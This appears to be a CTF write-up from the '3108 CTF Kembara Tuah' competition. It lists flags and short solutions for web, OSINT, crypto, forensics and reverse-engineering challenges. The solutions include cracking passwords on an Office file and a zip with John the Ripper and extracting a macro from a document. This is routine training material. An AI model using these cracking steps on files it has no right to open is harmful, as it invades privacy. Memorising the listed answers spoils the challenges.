Kedah

Wordle Bahasa Utaqa (Web)

FLAG: 3108{h4ng_m3m4ng_s3mp0i}

Langkawi Di Hati (Web)

I tried so many things. Till… i try the word “salah” as shown below when you gave all the password salah.

tidak betul

lagi

lagi lain kali

tidak tepat

Just do it like that. it will go next next next till it prompt the flag.

FLAG: 3108{k3t4hu1_p@ssw0rd_4nd4}

Perlis

Jalan Jalan Desa (Osint)

Attached: Syah_Vacation.jpg

FLAG: 3108{Muzium_Bersejarah_Perlis}

Syah Sesat (Crypto)

}AYPF_KYMSOL_TOMMNG{8013EJVWASCUQOYOAGNURBETMYUIBMTNHGMALKGZTXUBDPS

Key : AMPUKAMPUKBULAN

We decode using Vigenere Cipher and Reverse

FLAG: 3108{GAMBUS_BUDAYA_LAMA}

Sekaya (Web)

Hint: mungkin ada image sekaya di dalam webpage

3108:komeyuserbiasa

The hint make me find the image.

fe659c594df63b4d9854ec41ecb7cb12d33d1e90a383e7df2a10ad64ca1001ea

“sekaya di gambar adalah admin”

FLAG: 3108{Roti_SeKaya_Untuk_Kapa}

Sabah

Cer Cari (Linux)

the text file give us a lot of years.

Do some research on important dates for Sabah. Turn out it the year of Sabah Merdeka. 1963

cat CerCari | grep "1963"

FLAG: 3108{S4b4h_1963}

Asal Nama Sabah (RE)

You may refer to how he solve this challenge. Thank You for the solution. :)

https://github.com/oxygen28/CTF/tree/279b01d3d6697722c3470d12a2131237ecd5c1c0/3108%20CTF%20Kembara%20Tuah/reverse/Asal%20Nama%20Sabah

FLAG: 3108{S4B4H_S4PP4H}

Lahad Datu (Forensic)

Hint: Jikalau jawapan anda tidak dapat disubmit, mungkin itu bukan jawapannya. Cuba lagi

Given a locked doc file.

office2john Lahad_Datu > hash

john --wordlist=rockyou.txt hash

Now, open the doc with the password. playboy

I did try submit the flag at below. But em wrong.. then i see something wrong.

the flag cant be read. and there is a word that are bold. why?

Text: 3108{0Y3R4E1_D4FF4E}

Key: JamalulKiramIII

Head to Cyber Chef

FLAG: 3108{0P3R4S1_D4UL4T}

Sarawak

Makanan Popular (Linux)

strings Makanan | grep "3108"

FLAG: 3108{L4KS4_S4R4W4K}

Sarawak Kita (RE)

Attached: Sarawak_KITA.doc.bin

file Sarawak_KITA.doc.bin

oleid Sarawak_KITA.doc.bin

We can see that the output showing contain VBA kan.

olevba Sarawak_KITA.doc.bin

now, we try to decode base64 that we get from read the vba file.

base64 -d <<<"MwAxADAAOAB7AEsAdQBjAGgAMQBuAGcAXwAxAGIAdQBfAE4AMwBnADMAcgAxAF8AUwA0AHIANAB3ADQAawB9AA=="

FLAG: 3108{Kuch1ng_1bu_N3g3r1_S4r4w4k}

Daerah Sabah & Sarawak (Forensic)

unzip Kenali_Daerah_SabahSarawak.zip

2.jpg

3.jpg

4.jpg

Then, I noticed that this three have a BIG diff of file size.

Lets dig more into 3.jpg

binwalk -e 3.jpg

Output: trailing_data.bin

Its actually a RAR file

unrar e trailing_data.bin

get 2 more file
- Daerah_Sabah&Sarawak.txt
- file.zip

Cannot unzip file.zip

So, we try to brute force using Daerah_Sabah&Sarawak.txt as dictionary.

zip2john file.zp > hash

john --wordlist=Daerah_Sabah&Sarawak.txt hash

Password: LubokAntu

Got txt file

cat BenderaKeNi.txt

FLAG: 3108{S4B4H_27_D43RAH_S4R4W4K_40_D43R4H}

THANK YOU FOR READING :)